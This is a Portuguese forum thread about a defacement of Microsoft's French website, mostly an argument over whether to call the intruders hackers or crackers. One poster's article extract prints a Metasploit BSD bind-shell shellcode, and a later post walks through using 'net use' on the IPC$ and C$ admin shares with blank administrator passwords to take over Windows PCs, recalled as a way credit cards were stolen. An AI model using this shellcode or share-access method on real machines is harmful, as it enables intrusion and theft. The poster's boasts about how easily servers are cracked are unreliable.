Jump to content

Website Francês da Microsoft Hackeado!!!


AriOps
 Share

Recommended Posts

deathseeker25

Vamos ver se conseguem "hackear" o .com...Dúvido..

O que é estranho é a ainda não terem tirado a mensagem dos hackers... :nono1:

Realmente... ;)

Estão a ser lentos demais a agir... :P

Link to comment
Share on other sites

primeiro... o site não foi HACKEADO... foi CRAKADO... acho muito mau ppl que anda neste mundo não perceber os TERMOS BÁSCICOS.. mas enfim...

segundo... sabem quanto tempo demora a crakar um site que corra com o windows 2003 ?? 2 a 3 minutos.. são mesmo muitos os sites que "red teams" crakam com sucesso... apenas não é tornado publico... acham que têm algum mérito um militar disparar a sua arma contra uma criança?... não digo isto porque ouço falar ou li num forum... é por experiencia própria... 

o que acontece é que os PRÓS não divulgam o que fazem.. fazem pelo prazer de fazer... e gostam de manter o silencia porque querem manter o acesso por muito tempo... qualquer craker têm muitos hosts sob seu dominio sem que os admins o saibam...

o próprio pentagno assume qur têm sido várias vezes atacado com sucesso... não achem que isso para expecialistas é complicado... a questão é que hoje muita gente diz que é o que não é...

não vejo qual o mérito de crakar um site que corre num SO que todos sabemos ter SEMPRE exploits activos...

e enquanto houver pessoas a dizer que não é necessário firewall... nunca mudará... até com firewall não estão seguros...

um dos problemas da M$ é que apenas querem mostrar IMAGEM sem se preocuparem com as questões técnicas... quando alguem descobre um exploit para o windows e publica, a M$ em vez de assumir e corrigir, nega a existencia desse exploit... isto faz com que os admins desses SO não tomem as medidas necessárias...

todos os dias são descobertas vulnerabilidades e respectivos exploits e o problema está na forma como se resolvem esses problemas... se se assumir o problema e se corrigir rapidamente não dá tempo que algum puto ataque esse site... o problema está na arrogancia da microsoft...

aqui fica um extrato de um artigo feito por mim...

Nos dias de hoje com o numero crescente de especialistas a observar de perto os produtos informáticos em uso, introduziu-se uma nova dimensão para a administração de sistemas informáticos. A análise constante e automatizada dos sistemas em busca de vulnerabilidades que possam permitir o uso indevido desses mesmos sistemas. As vulnerabilidades são situações técnicas nos produtos, sejam aplicações, sistemas operativos, equipamentos físicos, etc. Permitem a um utilizador mal intencionado (cracker) executar determinados procedimentos explorando essas vulnerabilidades, abrindo buracos na segurança de um sistema. Muitas vezes as vulnerabilidades são erros ou más configurações que podem permitir entre diversas coisas o acesso remoto ao sistemas, a anulação de funcionalidades e serviços. São desenvolvidos programas ou técnicas que tiram partido das vulnerabilidades sendo conhecidos na comunidade como exploits e os mais apetecíveis para o cracker são os que abusam de falhas que permitem a execução de código/comandos remotos com recurso a Shell Code.

Podem aprender mais sobre os exploits num site destinado ao seu desenvolvimento e uso. Este site disponibiliza uma framework para os auditores de segurança, Red Teams/Penetration Testers, facilmente executarem os exploits identificando falhas de segurança nos seus clientes, permitindo que estes sejam corrigidos, normalmente através de actualizações ou alterações na configuração dos seus sistemas, antes que um cracker o use essa falha com fins prejudiciais. O processo envolve muitas vezes o “penetrar” com sucesso do sistema alvo.

O site metasploit (www.metsploit.com) disponibiliza uma  instalação de demonstração onde poderão ficar com uma ideia geral destas técnicas. Uma parte muito importante no explorar de vulnerabilidades são os payloads, shell code, que é injectado remotamente permitindo a execução de diversas operações no sistema alvo, que não estão autorizadas pelos administradores. Normalmente esse código é executado com as permissões do utilizador do serviço/aplicação vulnerável. Um dos pontos porque é importante a utilização de contas com privilégios mínimos para os serviços/aplicações expostas.

Demonstração da framework MetaSploit

http://metasploit.com:55555/PAYLOADS'>http://metasploit.com:55555/PAYLOADS

Exemplo de um Payload “BSD IA32 Bind Shell“

# bsd_ia32_bind -  LPORT=4444 Size=104 Encoder=PexFnstenvSub http://metasploit.com

my $shellcode =

"\x2b\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7b".

"\x6e\x59\x2b\x83\xeb\xfc\xe2\xf4\x11\x0f\x01\xb2\x29\x06\x49\x29".

"\x6a\x32\xd0\xca\x29\x2c\x0b\x69\x29\x04\x49\xe6\xfb\xf7\xca\x7a".

"\x28\x3c\x33\x43\x23\xa3\xd9\x9b\x11\xa3\xd9\x79\x28\x3c\xe9\x35".

"\xb6\xee\xce\x41\x79\x37\x33\x71\x23\x3f\x0e\x7a\xb6\xee\x10\x52".

"\x8e\x3e\x31\x04\x54\x1d\x31\x43\x54\x0c\x30\x45\xf2\x8d\x09\x7f".

"\x28\x3d\xe9\x10\xb6\xee\x59\x2b";

Como podemos verificar existem diversas técnicas nos dias correntes que permitem trespassar todas as medidas de segurança comprometendo com sucesso sistemas informáticos que estejam vulneráveis a certos exploits.

Nos Dias de hoje as vulnerabilidades são descobertas cada vez mais rápido e os exploits são desenvolvidos e disponibilizados muitas vezes em dias, tornando-se essencial à manutenção de um sistema informático a implementação de um processo de análise de vulnerabilidades, com a finalidade de alertar para actualizações ou reconfigurações dos respectivos sistemas.

[glow=red,2,300]Se usar um sistema Microsoft é imperativo que mude para um sistema Linux/Unix, de outra forma nunca poderá manter um nível de segurança aceitável.[/glow] isto porque a M$ têm uma péssima politica em relação ao assumir dos erros.

Tornou-se claro que um processo deste tipo têm de passar pela implementação de um serviço que possa efectuar testes, muitas vezes executando as técnicas inerentes ao exploit para verificar a existência da vulnerabilidade explorada. Existem diversos produtos e vão surgindo cada vez mais, cujo objectivo é efectuar esses testes. Existem produtos comerciais de milhares de euros e outros gratuitos sob licenciamento GPL, que e o caso do Nessus, o produto abordado neste artigo.

teckV

Link to comment
Share on other sites

primeiro... o site não foi HACKEADO... foi CRAKADO... acho muito mau ppl que anda neste mundo não perceber os TERMOS BÁSCICOS.. mas enfim...

Sim eu sei disso, só não me lembrei, postei logo "Hackeado" por causa do "Hacked" que estava na página, foi puro reflexo, sorry.

Quando ao resto concordo contigo, eu instalei o win server 2003 à uns meses e não durou 2 dias até deixar de passar do boot...lol

Cumps

Daniel Correia

Link to comment
Share on other sites

Fica aqui a definição da wikipedia

A hacker(http://en.wikipedia.org/wiki/Hacker) is a person who creates and modifies computer software and computer hardware, including computer programming, administration, and security-related items. The term usually bears strong connotations, but may be either positive or negative depending on cultural context (see the Hacker definition controversy).

System cracking, the defeating of security devices in computer networks, the process of gaining unauthorized access to a computer system (typically carried out by a black-hat hacker). Cracking can be defined as the act of entering a computer or computer network by force, whereas hacking does so by manipulation. (http://en.wikipedia.org/wiki/System_cracking)

Hacker é o nome do gajo que faz, mas o que ele faz é cracking  😁

- Destineo

Link to comment
Share on other sites

A hacker(http://en.wikipedia.org/wiki/Hacker) is a person who creates and modifies computer software and computer hardware, including computer programming, administration, and security-related items

meu amigo... o que está na wikipedia é o que uma pessoa individual acha de um assunto e provavelmente essa pessoa não pertence à comuniudade... tipo... se fores à biblia ficas a ver um homem jesus como um Deus... se fores ao corão esse gajo já não é Deus... conclusão... são apenas opiniões... apesar de eu concordar com essa afirmação acho-a um pouco perigosa... modificar... hummm todos modificam.. mas associar esse verbo ao termo hacker é perigoso... é pura psicologia... mas ok... o problema é as outras afirmações que por ai andam...

eu tenho acompanhado esta situação e vou vos falar da minha experiencia pessoal...

o termo Hacker quer dizer "cortar a direito" "cortar à machadada"... o termo direito quer dizer "o que está certo"... portantos Hacker no ponto de vista intemporal quer dizer "fazer algo de uma forma radical"... tipo... temos um grande problema e vamos resolve-lo com uma machadada... quer dizer... anulamos o problema de uma forma extraordinária e radical... tipo.. certas pessoas precissam de dar 50 voltas a uma arvore para a desenhar... um hacker numa forma extremamente eficaz consegue o mesmo resultado com uma unica volta... podemos dizer que ele HACKOU a situação.. resoveu-a de uma forma completamente nova, radical e com uma eficácia extraordinária...

o termo Hacker existe desde sempre... muito antes de existirem computadores já existia essa expressão... "sou um hacker" - sou uma pessoa que resolve os problemas de uma forma radical e extremamente eficaz...

foi no MIT que o termo Hacker começou a ser associado à comunidade tecnológica nomeadamente no departamento que construia um sistema electrónica para gerir as linhas dos comboios... foram eles próprios que se começaram a chamar de hackers, porque estavam a criar soluções inovadoras e radicais em relação a tudo o que se tinha feito até ao momento...

os primeiros apaixonados da informática consideravam-se hacker porque no inicio era um mundo extremamente complexo e apenas acessivel a uma elite... no inicio que quisesse programar tinha de construir o seu computador... havia um ou outro kit mas era necessário conhecimentos profundo de electronica e hardware... eram hackers porque tinham capacidades de criação e resolução extremas...

o termo hacker era usado como forma de destinguir os melhores e era um orgulho ser-se chamado de hacker

entretanto começaram a aparecer as questões de segurança.. não era cracking porque os sistemas não estavam protegidos... não havia firewalls, usavam-se passwords default ou muito fracas (isto não mudou, em poucos minutos procurando na rede PT vão encontrar muitos serviços com passwords default, a branco ou passords muito fracas que aparecem em qualquer password list publicada na net)...

e se eu vo disser que até aparecer o service pack do XP que impede de fazer "partilhas" sem passord qulaquer técnico podia entrar num minuto em qualquer computador com o sistema operativo XP ou anteriores?

não acreditam? vamos fazer o teste do algodão...

nos sistemas microsoft existe o conceito de partilha de sistema, isto é, mesmo que voçes não partilhem nada no vosso sistema o windows disponibiliza partilhas para administração e manutenção... as famosas partilhas do $....

partilhas existentes sempre no windows (só com hardenning as conseguem eliminar)

IPC$

C$

se usarem este comando e colocarem no user a conta de administração da maquina sem password... o que é o mais comum, a maior parte das pessoas não mete password no sistema... as instalaçãoes de windows nos computadores que se vendem em qualquer loja não têm password...

op seguinte comando dá acesso ao sistema alvo e ficam com previlégios administrativos

net use \\<server name>\IPC$ /USER:<domain>\<account>

podem mapear qualquer disco basta usar a letra do disco seguida de um dolar C$... mesmo que ninguem tenha partilhado o disco C está sempre activa a partilha de sistema que se identifica com o $... C$, D$, E$... assim sucessivamente

durante muitos anos (para quem usar sistemas anteriores ao Win XP SP2 estão ainda vulnerávei a isto) era tudo o que bastava para aceder a um computador remoto... era assim que se sacavam os cartões de crédito.. as pessoas não só estavam COMPLETAMENTE ABERTAS como tinha ficheiros em CLEAR TEXT com os numeros dos cartões, fotos eróticas, videos pessoais... enfim... tudo o que se queria...

e a microsoft nunca alertou para isto... na ganancia de vender não alertou as pessoas que o WINDOWS ÉRA UMA PORTA ABERTA

conclusão... qualquer gajo com uma hora de leitura podia aceder a muitas maquinas e sistema, os sistemas empresariais estavam vulneravei porcausa do qure falei das passwords defautl ou muito basicas... todos sabemos que muitos, mesmo muitos, administradores de sistemas usavam a palavra "deus" para password... numa rede procurava-se user accounts com a password "deus" e bingo.. quase sempre se entrava... nada de mais... muito simples mesmo... o factor humano é sempre o ele mais fraco...,  ?

começou-se a falar disto nos media... os jornalistas tiveram que encontrar um termo para identificar pessoas que usavam metodos ilegais para "roubar" informação... como os jornalistas não percebiam nada deste mundo (é muito underground, a maior partee das pessoas não faz ideia do que se passa no undergroun... nas universidades isso não se aprende... ou se é um "Natural Born" ou serão apenas expectadores...)

eu dizia, como os jornalistas e as pessoas que falavam disto não sabiam que nome dar e começaram a usar um nome que estava associada aos génios da informática... como as pessoas normalmente são muito ignorantes pensavam que alguem que entrava num sistema era um génio... pois... permitem que vos desiluda mas entrar num sistema comum não têm nada de génio (como mostrei anteriormente)... qulaquer um consegue se estudar a situação... o problema é que o ppl não gosta de estudar e apenas estudam os livros QUE SÃO OBRIGADOS PARA ACABAR O CURSO e deixam tudo o resto de lado... pois é... para mim a universidade MATA o conhecimento pois subjuga-o e domina-o consoante os interesses dos lobbies... é triste mas real... eu agradeço isso pois permite que facilmete eu consiga ter uma grande vantagem estratégica... OBRIGADO UNIVERSIDADE POR ISSO.. h3h3h3h3h  :P😄

foi assim que se começou a usar o termo HACKER para identificar as pessoas que invadiam sistemas com métodos completamente LAMERS... sem qualquer conhecimeto especial... nos dias de hoje já há sistemas + ou - protegidos.. mas mesmo assim as RED TEAMS têm provado que é possivel entrar... agora é no APLICATION LAYER... pois... e continua e continua e continua....  :)😁 ? ;)

em varios encontros da comunidade, DEFCON, Hackers on Planer Earth, What the HAck, etc... começou-se a aboradar esta questão... os verdaeiros hackers tiveram de esconder essa faceta da suas vidas para não serem confundidos... já viram o que é haver um termo que destingue os melhores devido aos seus conhecimentos técnicos e de repente, um termo que é o orgulho de muitos, e de repente começa a aparecer no jornal coisas como "Perigosos Hackers detroiem isto e aquilo" "Hackers tentam lançar misseis nucleares" LAMERS... tipo... e se agora começassem a falar (por ignorancia apenas) que os goleadores violam crianças... pois... o Ronaldo de repente tinha de esconder que é um goleador para não ser preso ou mal interpretado... ridiculo não? a realidade é muito ridicula... acreditem

então defini-se, pelo mesno para alguns e eu subescrevo, que começavasse a usar o termo CRACKER para essas actividades uma vez que o termo CRACKER sempre teve associações negativas... perdido por 10 perdido por 1000... na esperança de RENOVAR A GLÓRIA DO TERMO HACKER

HACKER é bom... hacker não invade sistemas... o HACKER não é perigoso....

é muito importante passar esta mensagem para ver se brevemente deixamos de ter MEDO de nos associarmos a esta palavra... no meu trabalho não posso dizer que sou hacker pois seria logo mal interpretado...

é responsabilidade das pessoas da comunidade usarem estes termos como deve ser... se estiver envolvida alguma coisa ilegal usem o termo CRACKER...

capiche??? espero ter contribuido para a compreensão desta hístória....

mais info sobre o Net Use...

http://www.ss64.com/nt/net_share.html

http://www.groovyweb.uklinux.net/?page_name=net%20use%20complete%20command%20reference%20how%20to%20tutorial

http://www.governmentsecurity.org/articles/ExploitingTheIPCShare.php

http://www.windowsnetworking.com/kbase/WindowsTips/WindowsNT/AdminTips/Network/IPCAuthenicationtoWindowsNTServers.html

http://www.windowsecurity.com/whitepapers/How_to_Break_into_Windows_NT_Improving_the_security_of_your_site_by_breaking_into_it_the_NT_version_.html

teckV

house of horus

Amon-Herakty

Link to comment
Share on other sites

Não chamem a isto hacking...

Chamar a isto hacking, ou aos tipos que fizeram isto hackers é propagar uma imagem negativa criada pelos media em relação ao hacking e aos hackers (porque nunca os entenderam). Hackers são pessoas que actuam de forma ética e legal para resolver problemas técnicos...

A verdadeira definição de hacker remonta aos anos 60, e refere-se a: uma pessoa com profundos conhecimentos técnicos, grande capacidade de aprender sozinho e obtém grande satisfação na resolução de problemas técnicos de alta complexidade. Os hackers são, indivíduos com profundos conhecimentos de programação e de alguns sistemas informáticos e com uma grande criatividade. Os hackers também têm gosto em partilhar as soluções para os problemas que resolveram. A cultura hacker tem origem nos laboratórios de engenharia e computação com grande destaque para os meios académicos como por exemplo no Laboratório de Inteligência Artificial do MIT.

Recentemente a falta de rigor e de profissionalismo dos media, e uma forte campanha de algumas empresas contra a cultura de partilha de conhecimento e trabalho dos hackers, tem-se manifestado em ataque a esta comunidade através da conotação com atitudes criminosas, de desrespeito primário pelo próximo e de vândalismo, atitudes essas que são realizadas por indivíduos nos quais esta comunidade não se revê - os crackers (existe alguma discussão sobre o termo usado para qualificar este tipo de indivíduos criminosos, mas não são aceites como hackers, por os seus comportamentos desviantes não fazerem parte da cultura hacker).

Hackers são indivíduos como os senhores Linus Torvalds (criador do kernel Linux), Paul Allen (co-fundador da Microsoft), Steve Jobs (co-fundador da Apple Computers e da NeXT? Corporation), o recentemente falecido Jeff Raskin (funcionário da Apple muito reputado na área de interfaces humano-máquina um dos primeiros indivíduos a criar o conceito de PDA), Richard M. Stallman (criador de uma boa parte do sistema GNU e fundador do movimento do Software Livre), e como Sir Tim Berners-Lee. Pessoas estas que são responsáveis por uma boa parte do desenvolvimento tecnológico na área da informática e dos computadores e não são criminosos. Aliás os hackers seguem um código de ética informal que lhes impede de ter atitudes tão negativas como violar uma lei de uma forma não acidental.

Link to comment
Share on other sites

obrigado por teres repetido o que disse reforçando... é necessário este tipo de entendimento na comunidade...  :P:)

só não percebi uma coisa...

Aliás os hackers seguem um código de ética informal que lhes impede de ter atitudes tão negativas como violar uma lei de uma forma não acidental.

que código é esse?? a ultima vez que vi isso ser debatido no DefCon não se chegou a um consenço... o Mentor's Manifest é algo poético mas sem definição pratica... pelo que sei a comunidade até anulou qualquer tentativa de se criar um código pois isso daria armas ao [Not Friend - Just FOE] de os estudar e tal e tal... fazer demografias bla bla e viam isso também como contrario à filosofia de "underground" e "invisibilidade" da comunidade...

o NEO é um activista e como tal não pode "abrir" o jogo todo... os interesses da comunidade são divergentes e voltamos sempre ao velho problema realçado por Nietzche... o que é Ético e o que não é Ético? quem define a Ética? os lobies? os politicos? a Madre Teressa de Calcutá? será Ético seguir o budismo ou o Islamisno? quem é tão PURO assim que é o modelo de Ética? e o que é a lei? dizer que os bancos devem pagar menos impostos que a mercearia lá do bairro é realmente uma lei? permiter melhores condições ao Chinocas que aos portugueses é uma lei de interesse Nacional? hummm... só nuvens negras e tempestuosas...

a resposta à comunidade foi... ficar exactamente como estava... o NEO sabe o que quer e para onde quer ir... não precisa de ÉTICAS ou CÓDIGOS pois os códigos e éticas até agora só serviram para que uns explorem outros sobre todas as formas... vejam o MATRIX... se o entenderem vão entender o que se passa na comunidade... é giro pois a realidade é um filme e esse filme é a realidade...  ? :)

neste momento as opniões dividem-se... à quem acredite no Defacing como forma de luta e há quem não o aceite... e isto continua por todas a areas de intervenção... tendo em conta que vivo intensamente a situação estou bastante interessado em conhecer esse código mesmo que informal... gostava de conhecer os ultimos desenvolvimentos pois sempre senti uma desilução em relação à incapacidade da comunidade em se organizar num movimento comum...

thanks in advance

teckV

the future forwarding the past

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.